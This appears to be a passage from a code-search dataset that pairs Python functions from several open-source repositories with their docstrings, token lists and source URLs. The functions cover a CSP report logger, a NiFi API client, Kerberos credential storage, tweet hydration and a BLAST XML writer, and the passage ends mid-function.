|
return HttpResponse()
|
Accept CSP reports and log them.
|
Accept CSP reports and log them.
|
[
"Accept",
"CSP",
"reports",
"and",
"log",
"them",
"."
] |
def cspreport(request):
"""Accept CSP reports and log them."""
report = ('blocked-uri', 'violated-directive', 'original-policy')
if not waffle.sample_is_active('csp-store-reports'):
return HttpResponse()
try:
v = json.loads(request.body)['csp-report']
# If possible, alter the PATH_INFO to contain the request of the page
# the error occurred on, spec: http://mzl.la/P82R5y
meta = request.META.copy()
meta['PATH_INFO'] = v.get('document-uri', meta['PATH_INFO'])
v = [(k, v[k]) for k in report if k in v]
log_cef('CSPViolation', 5, meta,
signature='CSPREPORT',
msg='A client reported a CSP violation',
cs6=v, cs6Label='ContentPolicy')
except (KeyError, ValueError), e:
log.debug('Exception in CSP report: %s' % e, exc_info=True)
return HttpResponseBadRequest()
return HttpResponse()
|
[
"def",
"cspreport",
"(",
"request",
")",
":",
"report",
"=",
"(",
"'blocked-uri'",
",",
"'violated-directive'",
",",
"'original-policy'",
")",
"if",
"not",
"waffle",
".",
"sample_is_active",
"(",
"'csp-store-reports'",
")",
":",
"return",
"HttpResponse",
"(",
")",
"try",
":",
"v",
"=",
"json",
".",
"loads",
"(",
"request",
".",
"body",
")",
"[",
"'csp-report'",
"]",
"# If possible, alter the PATH_INFO to contain the request of the page",
"# the error occurred on, spec: http://mzl.la/P82R5y",
"meta",
"=",
"request",
".",
"META",
".",
"copy",
"(",
")",
"meta",
"[",
"'PATH_INFO'",
"]",
"=",
"v",
".",
"get",
"(",
"'document-uri'",
",",
"meta",
"[",
"'PATH_INFO'",
"]",
")",
"v",
"=",
"[",
"(",
"k",
",",
"v",
"[",
"k",
"]",
")",
"for",
"k",
"in",
"report",
"if",
"k",
"in",
"v",
"]",
"log_cef",
"(",
"'CSPViolation'",
",",
"5",
",",
"meta",
",",
"signature",
"=",
"'CSPREPORT'",
",",
"msg",
"=",
"'A client reported a CSP violation'",
",",
"cs6",
"=",
"v",
",",
"cs6Label",
"=",
"'ContentPolicy'",
")",
"except",
"(",
"KeyError",
",",
"ValueError",
")",
",",
"e",
":",
"log",
".",
"debug",
"(",
"'Exception in CSP report: %s'",
"%",
"e",
",",
"exc_info",
"=",
"True",
")",
"return",
"HttpResponseBadRequest",
"(",
")",
"return",
"HttpResponse",
"(",
")"
] |
https://github.com/mozilla/zamboni/blob/14b1a44658e47b9f048962fa52dbf00a3beaaf30/mkt/site/views.py#L229-L251
|
|
Chaffelson/nipyapi
|
d3b186fd701ce308c2812746d98af9120955e810
|
nipyapi/nifi/apis/flow_api.py
|
python
|
FlowApi.search_flow_with_http_info
|
(self, **kwargs)
|
return self.api_client.call_api('/flow/search-results', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResultsEntity',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
Performs a search against this NiFi using the specified search term
Only search results from authorized components will be returned.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_flow_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q:
:param str a:
:return: SearchResultsEntity
If the method is called asynchronously,
returns the request thread.
|
Performs a search against this NiFi using the specified search term
Only search results from authorized components will be returned.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_flow_with_http_info(callback=callback_function)
|
[
"Performs",
"a",
"search",
"against",
"this",
"NiFi",
"using",
"the",
"specified",
"search",
"term",
"Only",
"search",
"results",
"from",
"authorized",
"components",
"will",
"be",
"returned",
".",
"This",
"method",
"makes",
"a",
"synchronous",
"HTTP",
"request",
"by",
"default",
".",
"To",
"make",
"an",
"asynchronous",
"HTTP",
"request",
"please",
"define",
"a",
"callback",
"function",
"to",
"be",
"invoked",
"when",
"receiving",
"the",
"response",
".",
">>>",
"def",
"callback_function",
"(",
"response",
")",
":",
">>>",
"pprint",
"(",
"response",
")",
">>>",
">>>",
"thread",
"=",
"api",
".",
"search_flow_with_http_info",
"(",
"callback",
"=",
"callback_function",
")"
] |
def search_flow_with_http_info(self, **kwargs):
"""
Performs a search against this NiFi using the specified search term
Only search results from authorized components will be returned.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.search_flow_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str q:
:param str a:
:return: SearchResultsEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['q', 'a']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method search_flow" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'q' in params:
query_params.append(('q', params['q']))
if 'a' in params:
query_params.append(('a', params['a']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['tokenAuth']
return self.api_client.call_api('/flow/search-results', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResultsEntity',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"def",
"search_flow_with_http_info",
"(",
"self",
",",
"*",
"*",
"kwargs",
")",
":",
"all_params",
"=",
"[",
"'q'",
",",
"'a'",
"]",
"all_params",
".",
"append",
"(",
"'callback'",
")",
"all_params",
".",
"append",
"(",
"'_return_http_data_only'",
")",
"all_params",
".",
"append",
"(",
"'_preload_content'",
")",
"all_params",
".",
"append",
"(",
"'_request_timeout'",
")",
"params",
"=",
"locals",
"(",
")",
"for",
"key",
",",
"val",
"in",
"iteritems",
"(",
"params",
"[",
"'kwargs'",
"]",
")",
":",
"if",
"key",
"not",
"in",
"all_params",
":",
"raise",
"TypeError",
"(",
"\"Got an unexpected keyword argument '%s'\"",
"\" to method search_flow\"",
"%",
"key",
")",
"params",
"[",
"key",
"]",
"=",
"val",
"del",
"params",
"[",
"'kwargs'",
"]",
"collection_formats",
"=",
"{",
"}",
"path_params",
"=",
"{",
"}",
"query_params",
"=",
"[",
"]",
"if",
"'q'",
"in",
"params",
":",
"query_params",
".",
"append",
"(",
"(",
"'q'",
",",
"params",
"[",
"'q'",
"]",
")",
")",
"if",
"'a'",
"in",
"params",
":",
"query_params",
".",
"append",
"(",
"(",
"'a'",
",",
"params",
"[",
"'a'",
"]",
")",
")",
"header_params",
"=",
"{",
"}",
"form_params",
"=",
"[",
"]",
"local_var_files",
"=",
"{",
"}",
"body_params",
"=",
"None",
"# HTTP header `Accept`",
"header_params",
"[",
"'Accept'",
"]",
"=",
"self",
".",
"api_client",
".",
"select_header_accept",
"(",
"[",
"'application/json'",
"]",
")",
"# HTTP header `Content-Type`",
"header_params",
"[",
"'Content-Type'",
"]",
"=",
"self",
".",
"api_client",
".",
"select_header_content_type",
"(",
"[",
"'*/*'",
"]",
")",
"# Authentication setting",
"auth_settings",
"=",
"[",
"'tokenAuth'",
"]",
"return",
"self",
".",
"api_client",
".",
"call_api",
"(",
"'/flow/search-results'",
",",
"'GET'",
",",
"path_params",
",",
"query_params",
",",
"header_params",
",",
"body",
"=",
"body_params",
",",
"post_params",
"=",
"form_params",
",",
"files",
"=",
"local_var_files",
",",
"response_type",
"=",
"'SearchResultsEntity'",
",",
"auth_settings",
"=",
"auth_settings",
",",
"callback",
"=",
"params",
".",
"get",
"(",
"'callback'",
")",
",",
"_return_http_data_only",
"=",
"params",
".",
"get",
"(",
"'_return_http_data_only'",
")",
",",
"_preload_content",
"=",
"params",
".",
"get",
"(",
"'_preload_content'",
",",
"True",
")",
",",
"_request_timeout",
"=",
"params",
".",
"get",
"(",
"'_request_timeout'",
")",
",",
"collection_formats",
"=",
"collection_formats",
")"
] |
https://github.com/Chaffelson/nipyapi/blob/d3b186fd701ce308c2812746d98af9120955e810/nipyapi/nifi/apis/flow_api.py#L4490-L4568
|
|
mangye16/ReID-Survey
|
2ce2cfe890d78f6904890c9063ed156532325b60
|
video-reid-AWG/utils.py
|
python
|
save_gradient_images
|
(gradient, file_name)
|
Exports the original gradient image
Args:
gradient (np arr): Numpy array of the gradient with shape (3, 224, 224)
file_name (str): File name to be exported
|
Exports the original gradient image
|
[
"Exports",
"the",
"original",
"gradient",
"image"
] |
def save_gradient_images(gradient, file_name):
"""
Exports the original gradient image
Args:
gradient (np arr): Numpy array of the gradient with shape (3, 224, 224)
file_name (str): File name to be exported
"""
if not os.path.exists('../results'):
os.makedirs('../results')
# Normalize
gradient = gradient - gradient.min()
gradient /= gradient.max()
# Save image
path_to_file = os.path.join('../results', file_name + '.jpg')
save_image(gradient, path_to_file)
|
[
"def",
"save_gradient_images",
"(",
"gradient",
",",
"file_name",
")",
":",
"if",
"not",
"os",
".",
"path",
".",
"exists",
"(",
"'../results'",
")",
":",
"os",
".",
"makedirs",
"(",
"'../results'",
")",
"# Normalize",
"gradient",
"=",
"gradient",
"-",
"gradient",
".",
"min",
"(",
")",
"gradient",
"/=",
"gradient",
".",
"max",
"(",
")",
"# Save image",
"path_to_file",
"=",
"os",
".",
"path",
".",
"join",
"(",
"'../results'",
",",
"file_name",
"+",
"'.jpg'",
")",
"save_image",
"(",
"gradient",
",",
"path_to_file",
")"
] |
https://github.com/mangye16/ReID-Survey/blob/2ce2cfe890d78f6904890c9063ed156532325b60/video-reid-AWG/utils.py#L176-L191
|
||
hellohaptik/chatbot_ner
|
742104790170ae5b73c583c94db6786549337dc4
|
ner_v2/detectors/numeral/number_range/standard_number_range_detector.py
|
python
|
BaseNumberRangeDetector._detect_max_num_range_with_prefix_variants
|
(self, number_range_list=None, original_list=None)
|
return number_range_list, original_list
|
Method to detect number range containing only max value and keywords which identify value as min present
before them. Example - less than 2 {'less than' => keyword, '2' => max value},
At most seven hundred rupees {'At most' => keyword, 'seven hundred rupees'=>min value}
Args:
number_range_list (list):
original_list (list):
Returns:
(tuple): a tuple containing
(list): list containing detected numeric text
(list): list containing original numeral text
|
Method to detect number range containing only max value and keywords which identify value as min present
before them. Example - less than 2 {'less than' => keyword, '2' => max value},
At most seven hundred rupees {'At most' => keyword, 'seven hundred rupees'=>min value}
Args:
number_range_list (list):
original_list (list):
Returns:
(tuple): a tuple containing
(list): list containing detected numeric text
(list): list containing original numeral text
|
[
"Method",
"to",
"detect",
"number",
"range",
"containing",
"only",
"max",
"value",
"and",
"keywords",
"which",
"identify",
"value",
"as",
"min",
"present",
"before",
"them",
".",
"Example",
"-",
"less",
"than",
"2",
"{",
"less",
"than",
"=",
">",
"keyword",
"2",
"=",
">",
"max",
"value",
"}",
"At",
"most",
"seven",
"hundred",
"rupees",
"{",
"At",
"most",
"=",
">",
"keyword",
"seven",
"hundred",
"rupees",
"=",
">",
"min",
"value",
"}",
"Args",
":",
"number_range_list",
"(",
"list",
")",
":",
"original_list",
"(",
"list",
")",
":",
"Returns",
":",
"(",
"tuple",
")",
":",
"a",
"tuple",
"containing",
"(",
"list",
")",
":",
"list",
"containing",
"detected",
"numeric",
"text",
"(",
"list",
")",
":",
"list",
"containing",
"original",
"numeral",
"text"
] |
def _detect_max_num_range_with_prefix_variants(self, number_range_list=None, original_list=None):
"""
Method to detect number range containing only max value and keywords which identify value as min present
before them. Example - less than 2 {'less than' => keyword, '2' => max value},
At most seven hundred rupees {'At most' => keyword, 'seven hundred rupees'=>min value}
Args:
number_range_list (list):
original_list (list):
Returns:
(tuple): a tuple containing
(list): list containing detected numeric text
(list): list containing original numeral text
"""
number_range_list = number_range_list or []
original_list = original_list or []
if self.max_range_prefix_variants:
max_prefix_choices = '|'.join(self.max_range_prefix_variants)
max_range_start_pattern = re.compile(r'((?:{max_prefix_choices})\s+({number}\d+__))'.format(
number=numeral_constant.NUMBER_REPLACE_TEXT, max_prefix_choices=max_prefix_choices), re.UNICODE)
number_range_matches = max_range_start_pattern.findall(self.processed_text)
for match in number_range_matches:
number_range, original_text = self._get_number_range(min_part_match=None, max_part_match=match[1],
full_match=match[0])
if number_range and original_text:
number_range_list.append(number_range)
original_list.append(original_text)
return number_range_list, original_list
|
[
"def",
"_detect_max_num_range_with_prefix_variants",
"(",
"self",
",",
"number_range_list",
"=",
"None",
",",
"original_list",
"=",
"None",
")",
":",
"number_range_list",
"=",
"number_range_list",
"or",
"[",
"]",
"original_list",
"=",
"original_list",
"or",
"[",
"]",
"if",
"self",
".",
"max_range_prefix_variants",
":",
"max_prefix_choices",
"=",
"'|'",
".",
"join",
"(",
"self",
".",
"max_range_prefix_variants",
")",
"max_range_start_pattern",
"=",
"re",
".",
"compile",
"(",
"r'((?:{max_prefix_choices})\\s+({number}\\d+__))'",
".",
"format",
"(",
"number",
"=",
"numeral_constant",
".",
"NUMBER_REPLACE_TEXT",
",",
"max_prefix_choices",
"=",
"max_prefix_choices",
")",
",",
"re",
".",
"UNICODE",
")",
"number_range_matches",
"=",
"max_range_start_pattern",
".",
"findall",
"(",
"self",
".",
"processed_text",
")",
"for",
"match",
"in",
"number_range_matches",
":",
"number_range",
",",
"original_text",
"=",
"self",
".",
"_get_number_range",
"(",
"min_part_match",
"=",
"None",
",",
"max_part_match",
"=",
"match",
"[",
"1",
"]",
",",
"full_match",
"=",
"match",
"[",
"0",
"]",
")",
"if",
"number_range",
"and",
"original_text",
":",
"number_range_list",
".",
"append",
"(",
"number_range",
")",
"original_list",
".",
"append",
"(",
"original_text",
")",
"return",
"number_range_list",
",",
"original_list"
] |
https://github.com/hellohaptik/chatbot_ner/blob/742104790170ae5b73c583c94db6786549337dc4/ner_v2/detectors/numeral/number_range/standard_number_range_detector.py#L330-L358
|
|
osmr/imgclsmob
|
f2993d3ce73a2f7ddba05da3891defb08547d504
|
gluon/datasets/coco_hpe3_dataset.py
|
python
|
CocoHpe3MetaInfo.add_dataset_parser_arguments
|
(self,
parser,
work_dir_path)
|
Create python script parameters (for ImageNet-1K dataset metainfo).
Parameters:
----------
parser : ArgumentParser
ArgumentParser instance.
work_dir_path : str
Path to working directory.
|
Create python script parameters (for ImageNet-1K dataset metainfo).
|
[
"Create",
"python",
"script",
"parameters",
"(",
"for",
"ImageNet",
"-",
"1K",
"dataset",
"metainfo",
")",
"."
] |
def add_dataset_parser_arguments(self,
parser,
work_dir_path):
"""
Create python script parameters (for ImageNet-1K dataset metainfo).
Parameters:
----------
parser : ArgumentParser
ArgumentParser instance.
work_dir_path : str
Path to working directory.
"""
super(CocoHpe3MetaInfo, self).add_dataset_parser_arguments(parser, work_dir_path)
parser.add_argument(
"--input-size",
type=int,
nargs=2,
default=self.input_image_size,
help="size of the input for model")
parser.add_argument(
"--load-ignore-extra",
action="store_true",
help="ignore extra layers in the source PyTroch model")
|
[
"def",
"add_dataset_parser_arguments",
"(",
"self",
",",
"parser",
",",
"work_dir_path",
")",
":",
"super",
"(",
"CocoHpe3MetaInfo",
",",
"self",
")",
".",
"add_dataset_parser_arguments",
"(",
"parser",
",",
"work_dir_path",
")",
"parser",
".",
"add_argument",
"(",
"\"--input-size\"",
",",
"type",
"=",
"int",
",",
"nargs",
"=",
"2",
",",
"default",
"=",
"self",
".",
"input_image_size",
",",
"help",
"=",
"\"size of the input for model\"",
")",
"parser",
".",
"add_argument",
"(",
"\"--load-ignore-extra\"",
",",
"action",
"=",
"\"store_true\"",
",",
"help",
"=",
"\"ignore extra layers in the source PyTroch model\"",
")"
] |
https://github.com/osmr/imgclsmob/blob/f2993d3ce73a2f7ddba05da3891defb08547d504/gluon/datasets/coco_hpe3_dataset.py#L513-L536
|
||
zhl2008/awd-platform
|
0416b31abea29743387b10b3914581fbe8e7da5e
|
web_hxb2/lib/python3.5/site-packages/wagtail/utils/setup.py
|
python
|
assets_mixin.compile_assets
|
(self)
|
[] |
def compile_assets(self):
try:
subprocess.check_call(['npm', 'run', 'build'])
except (OSError, subprocess.CalledProcessError) as e:
print('Error compiling assets: ' + str(e)) # noqa
raise SystemExit(1)
|
[
"def",
"compile_assets",
"(",
"self",
")",
":",
"try",
":",
"subprocess",
".",
"check_call",
"(",
"[",
"'npm'",
",",
"'run'",
",",
"'build'",
"]",
")",
"except",
"(",
"OSError",
",",
"subprocess",
".",
"CalledProcessError",
")",
"as",
"e",
":",
"print",
"(",
"'Error compiling assets: '",
"+",
"str",
"(",
"e",
")",
")",
"# noqa",
"raise",
"SystemExit",
"(",
"1",
")"
] |
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_hxb2/lib/python3.5/site-packages/wagtail/utils/setup.py#L17-L22
|
||||
dboyd13/DSVR
|
56fd0b30294a02dabc8af9178c3ed9980c229c94
|
lib/IPy.py
|
python
|
_count1Bits
|
(num)
|
return ret
|
Find the highest bit set to 1 in an integer.
|
Find the highest bit set to 1 in an integer.
|
[
"Find",
"the",
"highest",
"bit",
"set",
"to",
"1",
"in",
"an",
"integer",
"."
] |
def _count1Bits(num):
"""Find the highest bit set to 1 in an integer."""
ret = 0
while num > 0:
num = num >> 1
ret += 1
return ret
|
[
"def",
"_count1Bits",
"(",
"num",
")",
":",
"ret",
"=",
"0",
"while",
"num",
">",
"0",
":",
"num",
"=",
"num",
">>",
"1",
"ret",
"+=",
"1",
"return",
"ret"
] |
https://github.com/dboyd13/DSVR/blob/56fd0b30294a02dabc8af9178c3ed9980c229c94/lib/IPy.py#L1264-L1270
|
|
geduldig/TwitterAPI
|
1cb89e8fc50b051707fb99d6c2bb235ada5faf1a
|
TwitterAPI/TwitterAPI.py
|
python
|
_hydrate_tweets
|
(data, includes, field_suffix)
|
return data
|
Insert expansion fields back into tweet data by appending
a new field as a sibling to the referenced field.
:param data: "data" property value in JSON response
:param includes: "includes" property value in JSON response
:param field_suffix: Suffix appended to a hydrated field name.
Either "_hydrate" which puts hydrated values into
a new field, or "" which replaces the current
field value with hydrated values.
:returns: Tweet status as a JSON object.
|
Insert expansion fields back into tweet data by appending
a new field as a sibling to the referenced field.
|
[
"Insert",
"expansion",
"fields",
"back",
"into",
"tweet",
"data",
"by",
"appending",
"a",
"new",
"field",
"as",
"a",
"sibling",
"to",
"the",
"referenced",
"field",
"."
] |
def _hydrate_tweets(data, includes, field_suffix):
"""Insert expansion fields back into tweet data by appending
a new field as a sibling to the referenced field.
:param data: "data" property value in JSON response
:param includes: "includes" property value in JSON response
:param field_suffix: Suffix appended to a hydrated field name.
Either "_hydrate" which puts hydrated values into
a new field, or "" which replaces the current
field value with hydrated values.
:returns: Tweet status as a JSON object.
"""
new_fields = []
for key in includes:
incl = includes[key]
for obj in incl:
for field in ['id', 'media_key', 'username']:
if field in obj:
_create_include_fields(data, (obj[field], obj), new_fields)
for item in new_fields:
parent = item[0]
field = item[1] + field_suffix
include = item[2]
if field in parent:
if item[1] == 'media_keys':
parent[field] += include
if field_suffix == '':
# REPLACE option
parent[field].remove(include[0]['media_key'])
else:
parent[field] = include
else:
parent[field] = include
return data
|
[
"def",
"_hydrate_tweets",
"(",
"data",
",",
"includes",
",",
"field_suffix",
")",
":",
"new_fields",
"=",
"[",
"]",
"for",
"key",
"in",
"includes",
":",
"incl",
"=",
"includes",
"[",
"key",
"]",
"for",
"obj",
"in",
"incl",
":",
"for",
"field",
"in",
"[",
"'id'",
",",
"'media_key'",
",",
"'username'",
"]",
":",
"if",
"field",
"in",
"obj",
":",
"_create_include_fields",
"(",
"data",
",",
"(",
"obj",
"[",
"field",
"]",
",",
"obj",
")",
",",
"new_fields",
")",
"for",
"item",
"in",
"new_fields",
":",
"parent",
"=",
"item",
"[",
"0",
"]",
"field",
"=",
"item",
"[",
"1",
"]",
"+",
"field_suffix",
"include",
"=",
"item",
"[",
"2",
"]",
"if",
"field",
"in",
"parent",
":",
"if",
"item",
"[",
"1",
"]",
"==",
"'media_keys'",
":",
"parent",
"[",
"field",
"]",
"+=",
"include",
"if",
"field_suffix",
"==",
"''",
":",
"# REPLACE option",
"parent",
"[",
"field",
"]",
".",
"remove",
"(",
"include",
"[",
"0",
"]",
"[",
"'media_key'",
"]",
")",
"else",
":",
"parent",
"[",
"field",
"]",
"=",
"include",
"else",
":",
"parent",
"[",
"field",
"]",
"=",
"include",
"return",
"data"
] |
https://github.com/geduldig/TwitterAPI/blob/1cb89e8fc50b051707fb99d6c2bb235ada5faf1a/TwitterAPI/TwitterAPI.py#L438-L473
|
|
ShreyAmbesh/Traffic-Rule-Violation-Detection-System
|
ae0c327ce014ce6a427da920b5798a0d4bbf001e
|
openalpr_api/models/plate_candidate.py
|
python
|
PlateCandidate.to_dict
|
(self)
|
return result
|
Returns the model properties as a dict
|
Returns the model properties as a dict
|
[
"Returns",
"the",
"model",
"properties",
"as",
"a",
"dict"
] |
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
|
[
"def",
"to_dict",
"(",
"self",
")",
":",
"result",
"=",
"{",
"}",
"for",
"attr",
",",
"_",
"in",
"iteritems",
"(",
"self",
".",
"swagger_types",
")",
":",
"value",
"=",
"getattr",
"(",
"self",
",",
"attr",
")",
"if",
"isinstance",
"(",
"value",
",",
"list",
")",
":",
"result",
"[",
"attr",
"]",
"=",
"list",
"(",
"map",
"(",
"lambda",
"x",
":",
"x",
".",
"to_dict",
"(",
")",
"if",
"hasattr",
"(",
"x",
",",
"\"to_dict\"",
")",
"else",
"x",
",",
"value",
")",
")",
"elif",
"hasattr",
"(",
"value",
",",
"\"to_dict\"",
")",
":",
"result",
"[",
"attr",
"]",
"=",
"value",
".",
"to_dict",
"(",
")",
"elif",
"isinstance",
"(",
"value",
",",
"dict",
")",
":",
"result",
"[",
"attr",
"]",
"=",
"dict",
"(",
"map",
"(",
"lambda",
"item",
":",
"(",
"item",
"[",
"0",
"]",
",",
"item",
"[",
"1",
"]",
".",
"to_dict",
"(",
")",
")",
"if",
"hasattr",
"(",
"item",
"[",
"1",
"]",
",",
"\"to_dict\"",
")",
"else",
"item",
",",
"value",
".",
"items",
"(",
")",
")",
")",
"else",
":",
"result",
"[",
"attr",
"]",
"=",
"value",
"return",
"result"
] |
https://github.com/ShreyAmbesh/Traffic-Rule-Violation-Detection-System/blob/ae0c327ce014ce6a427da920b5798a0d4bbf001e/openalpr_api/models/plate_candidate.py#L129-L153
|
|
zhl2008/awd-platform
|
0416b31abea29743387b10b3914581fbe8e7da5e
|
web_flaskbb/lib/python2.7/site-packages/pytz/tzinfo.py
|
python
|
DstTzInfo.__reduce__
|
(self)
|
return pytz._p, (
self.zone,
_to_seconds(self._utcoffset),
_to_seconds(self._dst),
self._tzname
)
|
[] |
def __reduce__(self):
# Special pickle to zone remains a singleton and to cope with
# database changes.
return pytz._p, (
self.zone,
_to_seconds(self._utcoffset),
_to_seconds(self._dst),
self._tzname
)
|
[
"def",
"__reduce__",
"(",
"self",
")",
":",
"# Special pickle to zone remains a singleton and to cope with",
"# database changes.",
"return",
"pytz",
".",
"_p",
",",
"(",
"self",
".",
"zone",
",",
"_to_seconds",
"(",
"self",
".",
"_utcoffset",
")",
",",
"_to_seconds",
"(",
"self",
".",
"_dst",
")",
",",
"self",
".",
"_tzname",
")"
] |
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_flaskbb/lib/python2.7/site-packages/pytz/tzinfo.py#L518-L526
|
|||
cloudera/hue
|
23f02102d4547c17c32bd5ea0eb24e9eadd657a4
|
desktop/core/ext-py/gssapi-1.5.1/gssapi/creds.py
|
python
|
Credentials.store
|
(self, store=None, usage='both', mech=None,
overwrite=False, set_default=False)
|
Store these credentials into the given store
This method stores the current credentials into the specified
credentials store. If the default store is used, support for
:rfc:`5588` is required. Otherwise, support for the credentials
store extension is required.
:requires-ext:`rfc5588` or :requires-ext:`cred_store`
Args:
store (dict): the store into which to store the credentials,
or None for the default store.
usage (str): the usage to store the credentials with -- either
'both', 'initiate', or 'accept'
mech (OID): the :class:`MechType` to associate with the
stored credentials
overwrite (bool): whether or not to overwrite existing credentials
stored with the same name, etc
set_default (bool): whether or not to set these credentials as
the default credentials for the given store.
Returns:
StoreCredResult: the results of the credential storing operation
Raises:
GSSError
ExpiredCredentialsError
MissingCredentialsError
OperationUnavailableError
DuplicateCredentialsElementError
|
Store these credentials into the given store
|
[
"Store",
"these",
"credentials",
"into",
"the",
"given",
"store"
] |
def store(self, store=None, usage='both', mech=None,
overwrite=False, set_default=False):
"""Store these credentials into the given store
This method stores the current credentials into the specified
credentials store. If the default store is used, support for
:rfc:`5588` is required. Otherwise, support for the credentials
store extension is required.
:requires-ext:`rfc5588` or :requires-ext:`cred_store`
Args:
store (dict): the store into which to store the credentials,
or None for the default store.
usage (str): the usage to store the credentials with -- either
'both', 'initiate', or 'accept'
mech (OID): the :class:`MechType` to associate with the
stored credentials
overwrite (bool): whether or not to overwrite existing credentials
stored with the same name, etc
set_default (bool): whether or not to set these credentials as
the default credentials for the given store.
Returns:
StoreCredResult: the results of the credential storing operation
Raises:
GSSError
ExpiredCredentialsError
MissingCredentialsError
OperationUnavailableError
DuplicateCredentialsElementError
"""
if store is None:
if rcred_rfc5588 is None:
raise NotImplementedError("Your GSSAPI implementation does "
"not have support for RFC 5588")
return rcred_rfc5588.store_cred(self, usage, mech,
overwrite, set_default)
else:
if rcred_cred_store is None:
raise NotImplementedError("Your GSSAPI implementation does "
"not have support for manipulating "
"credential stores directly")
store = _encode_dict(store)
return rcred_cred_store.store_cred_into(store, self, usage, mech,
overwrite, set_default)
|
[
"def",
"store",
"(",
"self",
",",
"store",
"=",
"None",
",",
"usage",
"=",
"'both'",
",",
"mech",
"=",
"None",
",",
"overwrite",
"=",
"False",
",",
"set_default",
"=",
"False",
")",
":",
"if",
"store",
"is",
"None",
":",
"if",
"rcred_rfc5588",
"is",
"None",
":",
"raise",
"NotImplementedError",
"(",
"\"Your GSSAPI implementation does \"",
"\"not have support for RFC 5588\"",
")",
"return",
"rcred_rfc5588",
".",
"store_cred",
"(",
"self",
",",
"usage",
",",
"mech",
",",
"overwrite",
",",
"set_default",
")",
"else",
":",
"if",
"rcred_cred_store",
"is",
"None",
":",
"raise",
"NotImplementedError",
"(",
"\"Your GSSAPI implementation does \"",
"\"not have support for manipulating \"",
"\"credential stores directly\"",
")",
"store",
"=",
"_encode_dict",
"(",
"store",
")",
"return",
"rcred_cred_store",
".",
"store_cred_into",
"(",
"store",
",",
"self",
",",
"usage",
",",
"mech",
",",
"overwrite",
",",
"set_default",
")"
] |
https://github.com/cloudera/hue/blob/23f02102d4547c17c32bd5ea0eb24e9eadd657a4/desktop/core/ext-py/gssapi-1.5.1/gssapi/creds.py#L153-L203
|
||
biopython/biopython
|
2dd97e71762af7b046d7f7f8a4f1e38db6b06c86
|
Bio/SearchIO/BlastIO/blast_xml.py
|
python
|
BlastXmlWriter._write_elem_block
|
(self, block_name, map_name, obj, opt_dict=None)
|
Write sibling XML elements (PRIVATE).
:param block_name: common element name prefix
:type block_name: string
:param map_name: name of mapping between element and attribute names
:type map_name: string
:param obj: object whose attribute value will be used
:type obj: object
:param opt_dict: custom element-attribute mapping
:type opt_dict: dictionary {string: string}
|
Write sibling XML elements (PRIVATE).
|
[
"Write",
"sibling",
"XML",
"elements",
"(",
"PRIVATE",
")",
"."
] |
def _write_elem_block(self, block_name, map_name, obj, opt_dict=None):
"""Write sibling XML elements (PRIVATE).
:param block_name: common element name prefix
:type block_name: string
:param map_name: name of mapping between element and attribute names
:type map_name: string
:param obj: object whose attribute value will be used
:type obj: object
:param opt_dict: custom element-attribute mapping
:type opt_dict: dictionary {string: string}
"""
if opt_dict is None:
opt_dict = {}
for elem, attr in _WRITE_MAPS[map_name]:
elem = block_name + elem
try:
content = str(getattr(obj, attr))
except AttributeError:
# ensure attrs that is not present is optional
if elem not in _DTD_OPT:
raise ValueError(f"Element {elem!r} (attribute {attr!r}) not found")
else:
# custom element-attribute mapping, for fallback values
if elem in opt_dict:
content = opt_dict[elem]
self.xml.simpleElement(elem, content)
|
[
"def",
"_write_elem_block",
"(",
"self",
",",
"block_name",
",",
"map_name",
",",
"obj",
",",
"opt_dict",
"=",
"None",
")",
":",
"if",
"opt_dict",
"is",
"None",
":",
"opt_dict",
"=",
"{",
"}",
"for",
"elem",
",",
"attr",
"in",
"_WRITE_MAPS",
"[",
"map_name",
"]",
":",
"elem",
"=",
"block_name",
"+",
"elem",
"try",
":",
"content",
"=",
"str",
"(",
"getattr",
"(",
"obj",
",",
"attr",
")",
")",
"except",
"AttributeError",
":",
"# ensure attrs that is not present is optional",
"if",
"elem",
"not",
"in",
"_DTD_OPT",
":",
"raise",
"ValueError",
"(",
